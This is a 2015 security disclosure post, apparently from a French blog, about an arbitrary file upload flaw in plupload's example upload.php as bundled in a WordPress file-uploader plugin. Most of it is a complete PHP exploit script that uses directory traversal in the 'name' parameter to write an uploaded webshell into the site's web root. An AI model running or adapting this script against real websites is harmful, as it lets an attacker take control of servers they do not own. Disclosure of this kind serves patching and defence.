PLUPLOAD EXAMPLE FILE ARBITRARY FILE UPLOAD

le 09/03/2015 20:56
PLUPLOAD EXAMPLE FILE ARBITRARY FILE UPLOAD

Multiple plugins vulnerabilities

A file named upload.php in an example dir in the plupload-2.1.2 php library allow an attacker to arbitrary upload a file on server server that hosts the php application. It allows to write on an ini_get("upload_tmp_dir") dir, but with path chars like "../../.." an a combination with a php error, we can write in a web path, or replace a file with web server right.

Exploit:

 
 /********************************
 
 Author: Adrien Thierry
 Website : http://seraum.com
disclosure : http://openbreach.com/index/OB-2015-0003
vendor : alerted

 Exploit for NMEDIA USER FILE UPLOADER 3.7, web root can be found with php error by accessing /nmedia-user-file-uploader/index.php

 
 ********************************/
/* EXPLOIT URL  */
$target_url= "http://thewpsite.something/wp-content/plugins/";
$plugin_path = "nmedia-user-file-uploader/js/plupload-2.1.2/examples/";
/* TARGET UPLOAD FILE */
$target_file = "upload.php";
/* FILE TO UPLOAD */
$file = "webshell.php";
/* NAME */
$name = "../../../../../../../../var/www/thesite/www/file.php";
 
/* LAUNCHING EXPLOIT */
do_post_request($target_url . $module_path . $target_file . "?name=" . $name, $target_url, $file, $name);
 
function do_post_request($url, $res, $file, $name)
{
    $data = "";
    $boundary = "---------------------".substr(md5(rand(0,32000)), 0, 10);
    $data .= "--$boundary\n";
    $fileContents = file_get_contents($file);
    $md5 = md5_file($file);
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"file.php\"\n";
    $data .= "Content-Type: text/plain\n";
    $data .= "Content-Transfer-Encoding: binary\n\n";
    $data .= $fileContents."\n";
    $data .= "--$boundary--\n";
    
    $data .= "Content-Disposition: form-data; name=\"vfb-submit\"\n";
    $data .= " ok ";
    $data .= $fileContents."\n";
    
    $params = array('http' => array(
    'method' => 'POST',
    'header' => 'Content-Type: multipart/form-data; boundary='.$boundary,
    'content' => $data
    ));
 echo " URL : " . $url;
$ctx = stream_context_create($params);
    $fp = fopen($url, 'rb', false, $ctx);
    if (!$fp)
    {
       throw new Exception("Erreur !");
    }
    $response = @stream_get_contents($fp);
    if ($response === false)
    {
       throw new Exception("Erreur !");
    }
    else
    {
        echo "file successfully uploaded here : PHP_INI_GET_UPLOAD/" . $name;
    }
}
 
?>

Pour partager l'information :
Twitter Facebook Google Plus Linkedin email